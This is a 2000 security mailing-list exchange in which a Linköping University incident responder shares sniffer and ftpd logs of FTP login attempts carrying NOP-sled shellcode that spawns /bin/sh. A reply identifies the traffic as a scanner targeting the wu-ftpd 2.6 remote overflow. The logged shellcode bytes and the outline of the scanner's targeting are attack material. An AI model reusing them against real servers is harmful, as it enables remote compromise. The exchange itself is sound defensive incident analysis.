Re: New or old FTP exploit?

[Bruce Dang <xfrog98 () YAHOO COM>]

Kent,

The scans you are getting are scans for wuftpd 2.6(1) (and others) remote
overflow.  There is a scanner that scans IPs in a text file, and looking @
the banner and figuring out what OS the remote victim is running.
Typically, it will check for REDHAT, (like Feb 28 or something, i dun
remember).  And if the date is correct, they will output BOX VULN, and there
goes another r00t ;>.  This is fairly old, like a couple months.  Just watch
out.  There are private wuftpd exploits that does not req. you to know the
remote OS or nething.  Have fun.

Cheers,

Bruce
----- Original Message -----
From: "Kent Engström" <kent () UNIT LIU SE>
To: <INCIDENTS () SECURITYFOCUS COM>
Sent: Monday, August 07, 2000 10:17 AM
Subject: New or old FTP exploit?


> Our /16 has been scanned at least two times from different foreign
> addresses during the last weeks with an exploit that seems to be the
> same. On both occasions, the connections are to port 21 with the
> would-be intruder trying to log in as "USER ftp" and "PASS
> long-string-with-nops-and-shellcode-in-it". From one of our users, I
> got the following log saved by sniffit:
>
> > USER ftp
> > USER ftp
> > PASS




1À1Û1É°FÍ?1À1ÛC?ÙA°?Í?ëk^1À1ɍ^
^
Ff¹ÿÿ
°'Í?1À^
°=Í?1À1ۍ^?C1ÉþÉ1À^° Í?þÉuó1À^F
^°=Í?þ°0þÈ^F1À^F?v?F ?óNV ° Í?1À1Û°
Í?èÿÿÿÿÿÿ0bin0sh1..11
> > PASS




1À1Û1É°FÍ?1À1ÛC?ÙA°?Í?ëk^1À1ɍ^
^
Ff¹ÿÿ
°'Í?1À^
°=Í?1À1ۍ^?C1ÉþÉ1À^° Í?þÉuó1À^F
^°=Í?þ°0þÈ^F1À^F?v?F ?óNV ° Í?1À1Û°
Í?èÿÿÿÿÿÿ0bin0sh1..11
> Another user sent me this:
>
> > Jul 22 05:47:16 yyyyy ftpd[11650]: ANONYMOUS FTP LOGIN FROM
xxxxxxxxxxxxxxxxxxxx [xxx.xxx.xx.xx],
> >




1À1Û1É°FÍ?1À1ÛC?ÙA°?Í?ëk^1À1ɍ^^A
^F^Df¹ÿ^A°'Í?1À^^A°=Í?1À1ۍ^^H?C^B1ÉþÉ1À^^H°^LÍ?þÉuó1À^F^I^^H°=Í?þ^N°0þÈ^
F^D1À^F^G?v^H?F^L?óN^HV^L°^KÍ?1À1Û°^AÍ?èÿÿÿ0bin0sh1..11
> > Jul 22 05:47:27 yyyyy ftpd[11650]: FTP session closed Jul 22 07:48:13
>
> Could somebody please tell me if this is an old exploit for some FTP
> deamon, or a new exploit?
>
> We have seen attacks coming from:
>  200.255.45.90  ppp50.cruiser.com.br
>  212.69.228.245 Legend Internet Ltd
>
> --
> Kent Engström, Linköping University Incident Response Team
> kent () unit liu se  abuse () liu se
> +46 13 28 1744
>
> UNIT, Linköping University; SE-581 83  LINKÖPING; SWEDEN


__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com